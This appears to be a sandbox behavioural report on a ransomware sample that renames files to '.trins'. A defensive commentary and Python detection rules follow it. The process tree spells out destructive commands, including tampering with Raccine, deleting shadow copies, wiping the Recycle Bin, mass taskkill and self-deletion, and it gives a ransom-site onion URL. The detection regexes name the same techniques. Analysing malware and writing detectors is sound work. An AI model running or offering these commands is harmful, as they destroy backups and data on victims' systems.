Analysis
- max time kernel: 149s
- max time network: 152s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 21/06/2022, 17:41

Static task: static1
Behavioral task: behavioral1 (Sample: sample.exe; Resource: win7-20220414-en)
Behavioral task: behavioral2 (Sample: sample.exe; Resource: win10v2004-20220414-en)
General
- Target: sample.exe
- Size: 94KB
- MD5: 26f65722f6307386f3aa23237f44c24a
- SHA1: d26becc64f43c7af17f2d39d3fc1b744ac3e8fbb
- SHA256: cce5a753888cb5b044c767fe8e95e410ebdf1e1c79cabc95db1c9e1a8e81c5e7
- SHA512: 241c6ba3e95206827fe26ee6ef279e0bad2fbe6d4b55732fdacd078e2a977726a01bc16fd4b213b7483a1f1e74d1355dc416fb04ad8d86e3da2443cfa499bbb1
Malware Config
Extracted
- Path: C:\Users\Admin\AppData\Local\Temp\RECOVERY.txt
- URL: http://pflujznptk5lmuf6xwadfqy6nffykdvahfbljh7liljailjbxrgvhfid.onion/account/create
Signatures

Modifies extensions of user files (8 IoCs)
Ransomware generally changes the extension on encrypted files.
All entries by process sample.exe:
- File renamed: C:\Users\Admin\Pictures\StartInstall.crw => C:\Users\Admin\Pictures\StartInstall.crw.trins
- File opened for modification: C:\Users\Admin\Pictures\StartInstall.crw.trins
- File renamed: C:\Users\Admin\Pictures\UndoSync.crw => C:\Users\Admin\Pictures\UndoSync.crw.trins
- File opened for modification: C:\Users\Admin\Pictures\UndoSync.crw.trins
- File renamed: C:\Users\Admin\Pictures\DebugGet.crw => C:\Users\Admin\Pictures\DebugGet.crw.trins
- File opened for modification: C:\Users\Admin\Pictures\DebugGet.crw.trins
- File renamed: C:\Users\Admin\Pictures\PingInvoke.crw => C:\Users\Admin\Pictures\PingInvoke.crw.trins
- File opened for modification: C:\Users\Admin\Pictures\PingInvoke.crw.trins

Deletes itself (1 IoC)
- PID 1764 cmd.exe
Drops startup file (1 IoC)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk (sample.exe)

Drops desktop.ini file(s) (6 IoCs)
All entries "File opened for modification" by process sample.exe:
- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini
- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini
- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini
- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini
Drops file in Program Files directory (63 IoCs)
All entries by process sample.exe; "opened" = File opened for modification, "created" = File created:
- opened C:\Program Files\UndoInstall.sql.trins
- opened C:\Program Files\EnterConfirm.mp3.trins
- opened C:\Program Files\FormatReset.m1v
- opened C:\Program Files\ResolveOpen.3gp2
- opened C:\Program Files\SearchResolve.wmv
- opened C:\Program Files\StepSet.vbe.trins
- opened C:\Program Files\SubmitMeasure.vst.trins
- opened C:\Program Files\CompleteBlock.sql.trins
- opened C:\Program Files\HideConvertFrom.ttc.trins
- opened C:\Program Files\JoinRemove.vdx.trins
- opened C:\Program Files\ConfirmShow.css
- opened C:\Program Files\LockExit.dib.trins
- opened C:\Program Files\ReceiveEnable.txt
- opened C:\Program Files\TestUnprotect.aiff
- opened C:\Program Files\ConfirmShow.css.trins
- opened C:\Program Files\DenyPublish.mpeg3
- opened C:\Program Files\ReceiveEnable.txt.trins
- opened C:\Program Files\ResolveOpen.3gp2.trins
- opened C:\Program Files\SuspendDisconnect.vsdm
- opened C:\Program Files\ApproveDisable.dot
- opened C:\Program Files\AssertUnlock.cmd
- opened C:\Program Files\ResolveComplete.php
- opened C:\Program Files\SwitchLimit.vssx
- opened C:\Program Files\OutSelect.WTV
- opened C:\Program Files\TestRestore.mpeg2.trins
- opened C:\Program Files\TestWatch.dwfx
- opened C:\Program Files\TestWatch.dwfx.trins
- opened C:\Program Files\UndoInstall.sql
- opened C:\Program Files\ExitRename.xps.trins
- opened C:\Program Files\JoinRemove.vdx
- opened C:\Program Files\PingProtect.docx
- opened C:\Program Files\SwitchLimit.vssx.trins
- opened C:\Program Files\UnprotectExport.vdw
- opened C:\Program Files\ApproveDisable.dot.trins
- opened C:\Program Files\FormatReset.m1v.trins
- opened C:\Program Files\SearchResolve.wmv.trins
- created C:\Program Files\RECOVERY.txt
- opened C:\Program Files\DenyPublish.mpeg3.trins
- opened C:\Program Files\EnterConfirm.mp3
- opened C:\Program Files\SuspendDisconnect.vsdm.trins
- opened C:\Program Files\TestUnprotect.aiff.trins
- opened C:\Program Files\ConvertFromReset.midi.trins
- opened C:\Program Files\ExitRename.xps
- opened C:\Program Files\LockExit.dib
- opened C:\Program Files\RestartConnect.rmi
- opened C:\Program Files\SubmitMeasure.vst
- opened C:\Program Files\CompleteBlock.sql
- opened C:\Program Files\ConvertFromReset.midi
- opened C:\Program Files\ConvertToHide.jfif.trins
- opened C:\Program Files\InvokePop.htm.trins
- opened C:\Program Files\RestartConnect.rmi.trins
- opened C:\Program Files\UnlockDeny.raw.trins
- opened C:\Program Files\HideConvertFrom.ttc
- opened C:\Program Files\PingProtect.docx.trins
- opened C:\Program Files\ResolveComplete.php.trins
- opened C:\Program Files\UnlockDeny.raw
- opened C:\Program Files\StepSet.vbe
- opened C:\Program Files\UnprotectExport.vdw.trins
- opened C:\Program Files\AssertUnlock.cmd.trins
- opened C:\Program Files\ConvertToHide.jfif
- opened C:\Program Files\InvokePop.htm
- opened C:\Program Files\OutSelect.WTV.trins
- opened C:\Program Files\TestRestore.mpeg2
Drops file in Windows directory (28 IoCs)
All entries by process sample.exe; "opened" = File opened for modification, "created" = File created:
- opened C:\Windows\system.ini.trins
- opened C:\Windows\TSSysprep.log
- opened C:\Windows\PFRO.log
- opened C:\Windows\WindowsUpdate.log
- opened C:\Windows\WindowsShell.Manifest.trins
- created C:\Windows\RECOVERY.txt
- opened C:\Windows\setuperr.log
- opened C:\Windows\TSSysprep.log.trins
- opened C:\Windows\win.ini.trins
- opened C:\Windows\msdfmap.ini
- opened C:\Windows\msdfmap.ini.trins
- opened C:\Windows\setupact.log
- opened C:\Windows\setupact.log.trins
- opened C:\Windows\bootstat.dat
- opened C:\Windows\PFRO.log.trins
- opened C:\Windows\Ultimate.xml
- opened C:\Windows\win.ini
- created C:\Windows\bootstat.dat.trins
- opened C:\Windows\WindowsUpdate.log.trins
- opened C:\Windows\WMSysPr9.prx
- opened C:\Windows\Ultimate.xml.trins
- opened C:\Windows\WindowsShell.Manifest
- opened C:\Windows\DtcInstall.log.trins
- opened C:\Windows\mib.bin
- opened C:\Windows\Starter.xml
- opened C:\Windows\system.ini
- opened C:\Windows\DtcInstall.log
- opened C:\Windows\Starter.xml.trins
Launches sc.exe (8 IoCs)
sc.exe is a Windows utility to control services on the system.
- PIDs (all sc.exe): 1724, 1968, 1500, 1196, 1880, 616, 1448, 1656

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Kills process with taskkill (48 IoCs)
- PIDs (all taskkill.exe): 1352, 792, 1676, 564, 780, 1996, 1352, 608, 1720, 316, 804, 916, 1808, 928, 1968, 1864, 296, 1680, 968, 848, 1640, 1424, 616, 1868, 816, 1928, 1984, 948, 1864, 316, 1872, 1392, 2028, 556, 916, 268, 1416, 2000, 1984, 1924, 1484, 1196, 700, 872, 1016, 1764, 2036, 268
Modifies registry class (12 IoCs)
All entries by process rundll32.exe:
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_Classes\Local Settings
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\edit
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell
- Set value (str): \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\open
- Set value (str): \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"
- Set value (str): \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\.trins
- Set value (str): \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\.trins\ = "trins_auto_file"
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\edit\command
- Key created: \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\trins_auto_file\shell\open\command

Modifies registry key (1 TTP, 1 IoC)
- PID 1404 reg.exe
Opens file in notepad (likely ransom note) (2 IoCs)
- PID 1516 notepad.exe
- PID 1276 NOTEPAD.EXE

Runs ping.exe (1 TTP, 1 IoC)
- PID 780 PING.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
- PID 1664 sample.exe (all 64 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
- PID 608 rundll32.exe
Suspicious use of AdjustPrivilegeToken (49 IoCs)
Token: SeDebugPrivilege in every entry; listed in report order, grouped by process:
- sample.exe: 1664
- taskkill.exe: 2036, 928, 848, 1808, 1868, 1352, 1984, 268, 1924, 816, 608, 700, 1720, 872, 1640, 316, 1864, 1872, 780
- conhost.exe: 1996
- taskkill.exe: 296, 2028, 556, 916, 1392, 1928, 1352, 1968, 1984, 792, 1676, 1016, 948, 1680, 1416, 1764, 968, 1424, 1864, 316, 804, 2000, 564, 1484, 1196, 616, 916
- powershell.exe: 1976
Suspicious use of FindShellTrayWindow (1 IoC)
- PID 1664 sample.exe

Suspicious use of SendNotifyMessage (1 IoC)
- PID 1664 sample.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Source is PID 1664 sample.exe in every entry; each target below is recorded 4 times (16 targets x 4 = 64):
- wrote to memory of PID 2036 (procid_target 29)
- wrote to memory of PID 652 (procid_target 31)
- wrote to memory of PID 1404 (procid_target 33)
- wrote to memory of PID 992 (procid_target 35)
- wrote to memory of PID 1656 (procid_target 37)
- wrote to memory of PID 1724 (procid_target 38)
- wrote to memory of PID 1968 (procid_target 41)
- wrote to memory of PID 1864 (procid_target 43)
- wrote to memory of PID 1500 (procid_target 44)
- wrote to memory of PID 1196 (procid_target 46)
- wrote to memory of PID 1880 (procid_target 49)
- wrote to memory of PID 616 (procid_target 50)
- wrote to memory of PID 1448 (procid_target 53)
- wrote to memory of PID 848 (procid_target 55)
- wrote to memory of PID 1808 (procid_target 56)
- wrote to memory of PID 928 (procid_target 57)
Processes
Children are indented under their parent.

- PID 1664  C:\Users\Admin\AppData\Local\Temp\sample.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\sample.exe"
  signatures: Modifies extensions of user files; Drops startup file; Drops desktop.ini file(s); Drops file in Program Files directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
  - PID 2036  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill" /F /IM RaccineSettings.exe
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 652  C:\Windows\SysWOW64\reg.exe
    cmd: "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  - PID 1404  C:\Windows\SysWOW64\reg.exe
    cmd: "reg" delete HKCU\Software\Raccine /F
    signatures: Modifies registry key
  - PID 992  C:\Windows\SysWOW64\schtasks.exe
    cmd: "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  - PID 1656  C:\Windows\SysWOW64\sc.exe
    cmd: "sc.exe" config Dnscache start= auto
    signatures: Launches sc.exe
  - PID 1724  C:\Windows\SysWOW64\sc.exe
    cmd: "sc.exe" config SQLTELEMETRY start= disabled
    signatures: Launches sc.exe
  - PID 1968  C:\Windows\SysWOW64\sc.exe
    cmd: "sc.exe" config FDResPub start= auto
    signatures: Launches sc.exe
  - PID 1864  C:\Windows\SysWOW64\cmd.exe
    cmd: "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  - PID 1500  C:\Windows\SysWOW64\sc.exe
    cmd: "sc.exe" config SSDPSRV start= auto
    signatures: Launches sc.exe
  - PID 1196  C:\Windows\SysWOW64\sc.exe
    cmd: "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    signatures: Launches sc.exe
  - PID 1880  C:\Windows\SysWOW64\sc.exe
    cmd: "sc.exe" config SQLWriter start= disabled
    signatures: Launches sc.exe
  - PID 616  C:\Windows\SysWOW64\sc.exe
    cmd: "sc.exe" config upnphost start= auto
    signatures: Launches sc.exe
  - PID 1448  C:\Windows\SysWOW64\sc.exe
    cmd: "sc.exe" config SstpSvc start= disabled
    signatures: Launches sc.exe
  - PID 848  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mspub.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1808  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mspub.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 928  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM synctime.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1868  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mydesktopqos.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1352  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mysqld.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1984  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM Ntrtscan.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 268  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM sqbcoreservice.exe /F
    signatures: Kills process with taskkill
  - PID 816  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mydesktopservice.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1924  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM agntsvc.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 608  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM isqlplussvc.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 700  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM firefoxconfig.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1720  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM steam.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 872  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM thebat.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1640  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM sqlwriter.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 316  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM onenote.exe /F
    signatures: Kills process with taskkill
  - PID 1864  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM ocomm.exe /F
    signatures: Kills process with taskkill
  - PID 1872  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM encsvc.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 780  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM PccNTMon.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1996  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM tbirdconfig.exe /F
    signatures: Kills process with taskkill
  - PID 296  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM infopath.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 2028  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM excel.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 556  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM dbeng50.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 916  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM msaccess.exe /F
    signatures: Kills process with taskkill
  - PID 1392  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mbamtray.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1928  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM outlook.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1352  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM thebat64.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1968  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM CNTAoSMgr.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 268  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" IM thunderbird.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1984  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM tmlisten.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 792  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM zoolz.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1676  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM wordpad.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1016  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM dbsnmp.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 948  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM msftesql.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1680  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mysqld-opt.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1416  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM xfssvccon.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1764  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM powerpnt.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1424  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM ocautoupds.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 968  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mydesktopqos.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1864  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM ocssd.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 316  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM visio.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 804  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM oracle.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 2000  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mydesktopservice.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 564  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM winword.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1484  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM sqlagent.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1196  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM mysqld-nt.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 616  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM sqlbrowser.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 916  C:\Windows\SysWOW64\taskkill.exe
    cmd: "taskkill.exe" /IM sqlservr.exe /F
    signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1976  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 1516  C:\Windows\SysWOW64\notepad.exe
    cmd: "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RECOVERY.txt
    signatures: Opens file in notepad (likely ransom note)
  - PID 1592  C:\Windows\SysWOW64\cmd.exe
    cmd: "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    - PID 780  C:\Windows\SysWOW64\PING.EXE
      cmd: ping 127.0.0.7 -n 3
      signatures: Runs ping.exe
    - PID 1880  C:\Windows\SysWOW64\fsutil.exe
      cmd: fsutil file setZeroData offset=0 length=524288 “%s”
  - PID 1764  C:\Windows\SysWOW64\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe
    signatures: Deletes itself
    - PID 1484  C:\Windows\SysWOW64\choice.exe
      cmd: choice /C Y /N /D Y /T 3
- PID 268  C:\Windows\system32\conhost.exe
  cmd: \??\C:\Windows\system32\conhost.exe "-3439596191425314019-4125160258150192761319059127-809508426-1685777795286717014"
- PID 1996  C:\Windows\system32\conhost.exe
  cmd: \??\C:\Windows\system32\conhost.exe "-9295736892041876431229420506148101041-1410211457-1314614114727357354515720437"
  signatures: Suspicious use of AdjustPrivilegeToken
- PID 608  C:\Windows\system32\rundll32.exe
  cmd: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\RestoreConnect.xla.trins
  signatures: Modifies registry class; Suspicious behavior: GetForegroundWindowSpam
  - PID 1276  C:\Windows\system32\NOTEPAD.EXE
    cmd: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RestoreConnect.xla.trins
    signatures: Opens file in notepad (likely ransom note)
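The process tree above is a compact catalogue of ransomware precursor behaviour: Raccine tampering (reg, schtasks and taskkill against the Raccine tray, task and registry key), sc.exe reconfiguration of SQL and VPN related services, a taskkill spree against databases, mail clients, Office and backup agents, shadow-copy deletion through WMI, wiping of $Recycle.bin, a ping-based delay, and self-deletion through cmd /C choice ... & Del. Three details matter before these strings are copied into detection content. The PowerShell one-liner as recorded reads `$_Delete()` with no member-access dot, which PowerShell rejects as a parse error, so as recorded it would have deleted no shadow copies. The ping/fsutil/Del chain still carries the unsubstituted format placeholder `“%s”`, so as recorded it zeroed and deleted no real file. And the rundll32 shell32.dll,OpenAs_RunDLL process and its NOTEPAD.EXE child are not descendants of sample.exe: OpenAs_RunDLL is the "Open with" dialog, here invoked on an encrypted file, and the `.trins` / `trins_auto_file` class keys written by rundll32.exe come from that dialog rather than from the sample. The following Python is an added example, not part of the tria.ge report or of the sample: it runs rules for the general form of these behaviours over constructed process-creation events modelled on this tree and attributes findings to the root of each process chain. The event fields, the PIDs used where the report reuses a PID, the taskkill threshold and the triage cut-off are assumptions.

```python
"""Added example, not sandbox output: rule set for the precursor behaviour in
the tree above, run over constructed Sysmon-style process-creation events.
Field names, reused PIDs, the taskkill threshold and the cut-off are assumed."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Command-line rules for the general technique, not only the exact strings in
# this report (vssadmin/wmic variants of shadow-copy deletion are included).
RULES = [
    ("raccine_tamper", re.compile(r"raccine", re.I)),
    ("shadow_copy_delete", re.compile(
        r"win32_shadowcopy.*delete|vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete", re.I)),
    ("service_disable", re.compile(r'\bsc(\.exe)?"?\s+config\s+\S+\s+start=\s*disabled', re.I)),
    ("recycle_bin_wipe", re.compile(r"\brd\s+/s\s+/q\s+\S*\$recycle\.bin", re.I)),
    ("fsutil_zero_file", re.compile(r"fsutil\s+file\s+setzerodata", re.I)),
    ("ping_delay", re.compile(r"\bping\s+127\.0\.0\.\d+\s+-n\s+\d+", re.I)),
]
TASKKILL_BURST = 10  # assumed: this many taskkill children under one root is a spree


def root_of(pid, by_pid):
    """Walk ppid links up to the top-most process present in the event set."""
    while pid in by_pid and by_pid[pid].ppid in by_pid:
        pid = by_pid[pid].ppid
    return pid


def analyze(events):
    """Return {root_pid: {"rules": [...], "taskkill_children": n, "score": n}}.
    Findings land on the chain root (cmd.exe -> fsutil.exe is charged to
    sample.exe). Real telemetry reuses PIDs: key on (pid, creation time) there."""
    by_pid = {e.pid: e for e in events}
    acc = defaultdict(lambda: {"rules": set(), "taskkill_children": 0})
    for e in events:
        f = acc[root_of(e.pid, by_pid)]
        for name, rx in RULES:
            if rx.search(e.cmdline):
                f["rules"].add(name)
        if e.image.lower().endswith("taskkill.exe"):
            f["taskkill_children"] += 1
        parent = by_pid.get(e.ppid)
        # cmd /C ... & Del "<parent image>": the parent is erasing its own file.
        if parent and re.search(r"\bdel\b", e.cmdline, re.I) \
                and parent.image.lower() in e.cmdline.lower():
            f["rules"].add("self_delete")
    out = {}
    for pid, f in acc.items():
        if f["taskkill_children"] >= TASKKILL_BURST:
            f["rules"].add("taskkill_burst")
        out[pid] = {"rules": sorted(f["rules"]),
                    "taskkill_children": f["taskkill_children"],
                    "score": len(f["rules"])}
    return out


def verdict(report, pid):
    """Assumed cut-off: three or more distinct behaviours under one root."""
    return "ransomware_precursor" if report[pid]["score"] >= 3 else "inconclusive"


S = r"C:\Users\Admin\AppData\Local\Temp\sample.exe"
W = r"C:\Windows\SysWOW64"
KILL_TARGETS = ["mspub.exe", "synctime.exe", "mysqld.exe", "Ntrtscan.exe",
                "sqbcoreservice.exe", "agntsvc.exe", "isqlplussvc.exe", "steam.exe",
                "excel.exe", "outlook.exe", "winword.exe", "sqlservr.exe"]


def sample_events():
    """Constructed events modelled on the tree above; PIDs 1765/1865/3000+ are invented."""
    ev = [
        ProcEvent(1664, 1200, S, f'"{S}"'),
        ProcEvent(2036, 1664, W + r"\taskkill.exe", '"taskkill" /F /IM RaccineSettings.exe'),
        ProcEvent(652, 1664, W + r"\reg.exe",
                  r'"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F'),
        ProcEvent(992, 1664, W + r"\schtasks.exe", '"schtasks" /DELETE /TN "Raccine Rules Updater" /F'),
        ProcEvent(1724, 1664, W + r"\sc.exe", '"sc.exe" config SQLTELEMETRY start= disabled'),
        ProcEvent(1865, 1664, W + r"\cmd.exe", r'"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin'),
        ProcEvent(1976, 1664, W + r"\WindowsPowerShell\v1.0\powershell.exe",
                  '"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }'),
        ProcEvent(1592, 1664, W + r"\cmd.exe",
                  '"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"'),
        ProcEvent(1880, 1592, W + r"\fsutil.exe", 'fsutil file setZeroData offset=0 length=524288 "%s"'),
        ProcEvent(1765, 1664, W + r"\cmd.exe",
                  '"C:\\Windows\\System32\\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "' + S),
        # Benign noise: a user opening a text file from Explorer.
        ProcEvent(900, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
        ProcEvent(901, 900, r"C:\Windows\System32\notepad.exe",
                  r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\notes.txt'),
    ]
    ev += [ProcEvent(3000 + i, 1664, W + r"\taskkill.exe", f'"taskkill.exe" /IM {t} /F')
           for i, t in enumerate(KILL_TARGETS)]
    return ev
```

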